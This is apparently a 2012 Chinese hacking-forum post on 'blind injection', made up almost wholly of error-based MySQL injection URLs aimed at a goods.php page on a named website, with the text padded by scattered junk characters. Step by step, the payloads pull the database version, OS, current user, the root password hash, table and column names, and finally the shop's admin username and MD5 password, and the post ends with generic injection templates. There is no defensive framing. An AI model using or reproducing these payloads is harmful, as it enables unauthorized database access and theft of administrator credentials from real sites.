标题: 盲注详细内容 [打印本页] 作者: admin 时间: 2012-9-5 14:59 标题: 盲注详细内容 判断版本号 # B/ _ R# r& M! G# G# _9 [http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 ! s- Z) h ^# B; v4 M 9 Y+ Q0 s9 i. T9 r判断系统 " V0 K3 W" e5 E5 }, m6 W, H) P0 @* L/ a' G8 F; C: l http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 ; }0 a: U' k6 c9 V 1 [& l9 Q3 d. L2 @; b* \ + n, J% v7 p) C) S3 \5 P$ b" \8 q h3 j6 ]) Y, ?( \: X
当前 user()
+ o" ?! P0 j; Q5 L3 thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 _9 D( E: j- G j+ K5 G' s
% v- v8 j, L K( J% j) b0 F 5 a* Y* l# B+ X$ S+ i6 j" _4 G* i, G: A& W) W' s9 c/ `
当前 database()) q; c4 `7 Y% w! B http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 2 E# L+ ~$ s. y+ \* _) a) [* f3 M+ b9 V% j6 d. a) \! p+ I$ u
2 c( T5 F' }4 J( e" ] * F: h1 u+ `3 I + K) s$ Y3 }4 l' C% @8 iroot hash 1 z( m% d6 f9 L8 \& U c; ~$ V & s( _; j) _5 \9 G3 fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 * V" O3 l/ T$ @ ; L' g4 I! R$ H! d; {; H. S1 F! Y6 o7 J( ~
当前 数据库表名
" j- W( T% W, q) t4 u0 x, B$ X+ x http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ J3 @9 \9 B$ p; C. J6 @5 }* D g
9 ?. ~0 w* m3 R1 K; k7 N# c
当前 数据库 user_name 字段
/ ^1 g5 G2 i0 U, u1 X) ? http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 8 d- O7 A- L: V' c9 U8 l2 M8 d! @8 n/ H* c( u# `8 t
当前 数据库 字段 password 2 ~) K) |" T% [http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' a' L [3 y/ Z: v& I8 w* E; m
8 @, `% c( A' j% _
% j* I! r/ o- S/ j* `* p! J9 K
9 n& z5 C3 d- b# K
获得 admin passwd(md5)
I/ e+ E1 s( E* h6 O" D4 a6 t y6 V t9 e0 l* { http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 9 s8 c4 J: |: `5 W' y' S$ I, i: Q7 H8 ]
报错注射
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) ; W/ z( m* {9 k/ M1 G m4 M0 f1 @" ^
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) 3 ~ r% e+ g5 v5 u! |, z- x- a( |( T / I" n. W9 w1 {" f1 r3 A- N" pand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)